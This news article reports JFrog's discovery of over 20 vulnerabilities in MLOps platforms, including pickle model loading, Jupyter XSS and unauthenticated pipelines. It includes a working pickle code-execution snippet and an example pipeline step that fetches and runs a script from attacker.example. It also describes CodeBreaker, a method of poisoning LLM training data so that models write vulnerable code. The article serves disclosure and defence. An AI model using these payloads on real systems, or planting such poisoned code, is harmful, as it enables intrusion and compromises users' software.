Researchers Discover More Than 20 Weaknesses in Supply Chain of MLOps Platforms

Security researchers are warning about risks in the machine learning (ML) software supply chain after uncovering more than 20 vulnerabilities that could be exploited to target MLOps platforms.

Described as inherent and implementation-based flaws, these vulnerabilities could lead to serious outcomes, from executing arbitrary code to loading malicious datasets.

MLOps platforms empower users to plan and implement an ML model pipeline, with a model registry serving as a storage and versioning platform for trained ML models. These models can then be integrated into an application or accessed by other clients through an API (also known as model-as-a-service).
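As a brief illustration of that workflow, the sketch below assumes an MLflow-style model registry; the model name, version, and sample input are placeholders rather than anything from the research.

```python
# Minimal sketch, assuming an MLflow-style registry; model name, version,
# and input are illustrative placeholders.
import mlflow.pyfunc

# Pull a trained model that was previously registered in the model registry.
model = mlflow.pyfunc.load_model("models:/fraud-detector/1")

# The same model could instead be exposed behind an API endpoint
# ("model-as-a-service") and queried by other clients.
print(model.predict([[0.1, 0.7, 0.2]]))
```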

“Inherent vulnerabilities are issues stemming from the underlying formats and procedures utilized in the targeted technology,” JFrog researchers said in a detailed report.

Some examples of inherent vulnerabilities involve exploiting ML models to execute the attacker’s chosen code by leveraging the models’ support for automatic code execution upon loading (e.g., Pickle model files).
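As a minimal sketch of that risk (not taken from the JFrog report), the snippet below shows how a Pickle-based "model" can run an attacker's command the moment it is deserialized:

```python
# Minimal sketch: pickle lets an object specify code that runs at load time,
# so a crafted "model" file executes the attacker's command when loaded.
import os
import pickle

class MaliciousModel:
    def __reduce__(self):
        # Whatever is returned here is invoked during unpickling.
        return (os.system, ("echo code executed on model load",))

blob = pickle.dumps(MaliciousModel())

# The victim merely "loads a model", yet the command above runs immediately.
pickle.loads(blob)
```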

This behavior extends to specific dataset formats and libraries that facilitate automatic code execution, potentially leading to malware attacks when loading a publicly available dataset.
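A short sketch of the same idea for datasets, assuming the Hugging Face datasets library (the dataset name is a placeholder): some datasets ship their own loading script, and opting in to it runs that Python code locally.

```python
# Hedged sketch: loading a dataset that bundles a loading script executes that
# script's Python code on the local machine. The dataset name is hypothetical.
from datasets import load_dataset

# If "some-public-dataset" includes a malicious loading script, its code runs
# here as part of the load, before any data is even returned.
ds = load_dataset("some-public-dataset", trust_remote_code=True)
```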

Another example of an inherent vulnerability relates to JupyterLab (formerly Jupyter Notebook), a web-based interactive computational environment allowing users to run blocks (or cells) of code and view the results.

“One undisclosed issue is how HTML output is managed when executing code blocks in Jupyter,” pointed out the researchers. “The Python code output may include HTML and JavaScript which can be rendered by the browser.”

The issue here is that this JavaScript output is not sandboxed from the rest of the web application, so it can interact with the application itself and, in turn, make it execute arbitrary Python code.

Consequently, an attacker who manages to run malicious JavaScript code could add a new cell to the current JupyterLab notebook, inject Python code into it, and execute it. This becomes particularly dangerous when the JavaScript is delivered by exploiting a cross-site scripting (XSS) vulnerability.
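The sketch below (not from the report) illustrates the underlying behavior: a code cell whose output is HTML containing JavaScript. Whether the embedded script actually runs depends on the Jupyter front end and its trust and sanitization settings, and the alert() call merely stands in for a real payload that would insert and run a new cell.

```python
# Illustrative sketch only: a code cell emitting HTML output that contains
# JavaScript. If the front end renders the output unsanitized, the script
# executes in the context of the notebook page. alert() is a harmless
# placeholder for a payload that would add and run a new Python cell.
from IPython.display import HTML, display

display(HTML("<script>alert('JavaScript running in the notebook page');</script>"))
```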

To that end, JFrog identified an XSS flaw in MLflow (CVE-2024-27132, CVSS score: 7.5) that stems from a lack of sanitization when running an untrusted recipe, resulting in client-side code execution in JupyterLab.

“One of the critical lessons from our study is that all XSS vulnerabilities in ML libraries should be treated as potential arbitrary code execution, as data scientists may utilize these ML libraries with Jupyter Notebook,” stated the researchers.

The second category of weaknesses concerns implementation flaws, such as a lack of authentication in MLOps platforms, which could allow a threat actor with network access to gain code-execution capabilities by abusing the ML Pipeline feature.
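As a purely hypothetical sketch of this class of flaw, an unauthenticated pipeline API might be abused as follows; the host, endpoint, and payload schema are invented for illustration and do not describe any specific product's API.

```python
# Hypothetical sketch of an unauthenticated MLOps pipeline API being abused
# for code execution. The host, endpoint, and payload schema are invented
# placeholders, not a real platform's interface.
import requests

PLATFORM = "http://mlops.internal:8080"  # assumed reachable from the attacker's network position

payload = {
    "pipeline": "training-job",
    # A pipeline step that runs attacker-controlled shell commands on the worker.
    "steps": [{"run": "curl https://attacker.example/payload.sh | sh"}],
}

# No credentials or tokens are required in this scenario: that absence is the flaw.
resp = requests.post(f"{PLATFORM}/api/pipelines/run", json=payload, timeout=10)
print(resp.status_code)
```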

These threats are not hypothetical: financially motivated adversaries have already abused such flaws, as observed with unpatched Anyscale Ray deployments (CVE-2023-48022, CVSS score: 9.8) being hijacked for cryptocurrency mining.

Another implementation vulnerability is a container escape targeting Seldon Core that enables attackers to go beyond code execution, move laterally across the cloud environment, and access other users' models and datasets by uploading a malicious model to the inference server.

Chaining these vulnerabilities could not only allow threat actors to infiltrate an organization and spread laterally within it, but also compromise the underlying servers.

“If you are implementing a platform that supports model serving, it should be noted that anyone capable of serving a new model can also execute arbitrary code on that server,” warned the researchers. “Ensure that the environment running the model is entirely isolated and fortified against a container escape.”

The disclosure coincides with Palo Alto Networks Unit 42 detailing two now-patched vulnerabilities in the LangChain generative AI framework (CVE-2023-46229 and CVE-2023-44467) that could have allowed attackers to execute arbitrary code and access sensitive data.

Trail of Bits also recently disclosed four issues in Ask Astro, an open-source retrieval-augmented generation (RAG) chatbot application, that could lead to chatbot output manipulation, inaccurate document ingestion, and potential denial-of-service (DoS).

As vulnerabilities continue to be uncovered in AI-powered applications, techniques are also being developed to poison training datasets with the goal of tricking large language models (LLMs) into generating vulnerable code.

“Unlike recent attacks that insert malicious payloads in discernible or irrelevant sections of the code (e.g., comments), CodeBreaker leverages LLMs (e.g., GPT-4) for sophisticated payload transformation (without affecting functionalities), ensuring that both the corrupted data for fine-tuning and generated code can bypass robust vulnerability detection,” explained a team of academics from the University of Connecticut.
